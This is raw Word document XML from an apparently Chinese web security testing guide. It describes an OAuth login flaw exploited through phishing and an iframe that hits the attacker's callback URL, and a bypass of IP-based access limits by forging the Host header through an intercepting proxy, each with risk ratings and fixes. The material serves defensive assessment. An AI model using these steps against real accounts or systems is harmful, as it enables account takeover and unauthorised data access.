        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099B1B61" wp14:editId="157B0300">
            <wp:extent cx="5487035" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="http://image.3001.net/2012/10/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3001.net/2012/10/Screenshot-3.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533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DD691" w14:textId="3406D217" w:rsidR="00F3199B" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某一特定的用户或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上随机的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求到你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，通过钓鱼等手段诱骗用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>example.com/somepage.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;iframe src=URL&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求时处于登录状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAE727" w14:textId="29F04098" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在，按下“</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>facebook</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006F275F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可以登录用户账户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2BCB8" w14:textId="6B2463CD"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t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BB1C1C" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者结合</w:t>
      </w:r>
      <w:r w:rsidR="00BB1C1C" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidR="00BB1C1C" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证缺陷和钓鱼攻击可定向的登录某个用户的账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9ECD5D"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6A393FA0" w14:textId="7A3DD9F3" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="00BC5B7A"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危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可导致用户资源任意访问或任意账户登陆或用户密码获取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BCA68" w14:textId="3A7FAB9A" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各应用除了验证</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>access token</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之外，还必须辅助其他参数进行判断（比如自行加入其它认证参数进行双重认证）；另一种方法则是验证</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>access token</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>背后所属的应用</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app key</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的唯一性和对应性（无论是自行验证还是开放平台通过签名等形式帮助验证），确保该</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>access token</w:t>
      </w:r>
      <w:r w:rsidR="00B5374E" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是该应用的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532285E1" w14:textId="5218A453" w:rsidR="00041170" w:rsidRPr="00AE2ACC" w:rsidRDefault="00041170" w:rsidP="00AE2AC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43CD286" w14:textId="6B84C998" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00594DBB" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc498434500"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址伪造</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="2595F818" w14:textId="44EF2F43"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EE197B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过伪造</w:t>
      </w:r>
      <w:r w:rsidR="00EE197B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00EE197B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址能够绕过应用</w:t>
      </w:r>
      <w:r w:rsidR="00EE197B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00EE197B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址限制，访问和执行系统相关功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20502A9F" w14:textId="3E200F9E"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r w:rsidR="00B26480" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用代理软件</w:t>
      </w:r>
      <w:r w:rsidR="00620904" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截请求包，修改</w:t>
      </w:r>
      <w:r w:rsidR="00620904" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00620904" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头中的</w:t>
      </w:r>
      <w:r w:rsidR="00620904" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidR="00620904" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，</w:t>
      </w:r>
      <w:r w:rsidR="005178E8" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidR="005178E8" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00BF76C6" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址绕过限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FCAD0" w14:textId="4E573F3F"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lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0072369D" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞访问受限</w:t>
      </w:r>
      <w:r w:rsidR="00D6610A" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidR="0072369D" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，造成应用系统数据泄漏</w:t>
      </w:r>
      <w:r w:rsidR="00D6610A" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21054679"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3C8750FB" w14:textId="77777777" w:rsidR="00FE0377" w:rsidRPr="00AE2ACC" w:rsidRDefault="00FE0377"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危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：访问重要系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行重要功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D660C" w14:textId="151031BA" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="00FE0377" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：访问非重要系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行非重要的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0CF40"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA37D7D" w14:textId="54D3C43A" w:rsidR="005015BD" w:rsidRPr="00AE2ACC" w:rsidRDefault="005015BD" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getServerName()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getHeader(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797AF9CE" w14:textId="2451A095" w:rsidR="00757422" w:rsidRDefault="005015BD" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里可以通过设置一个虚拟机来记录所有的非法</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host header</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
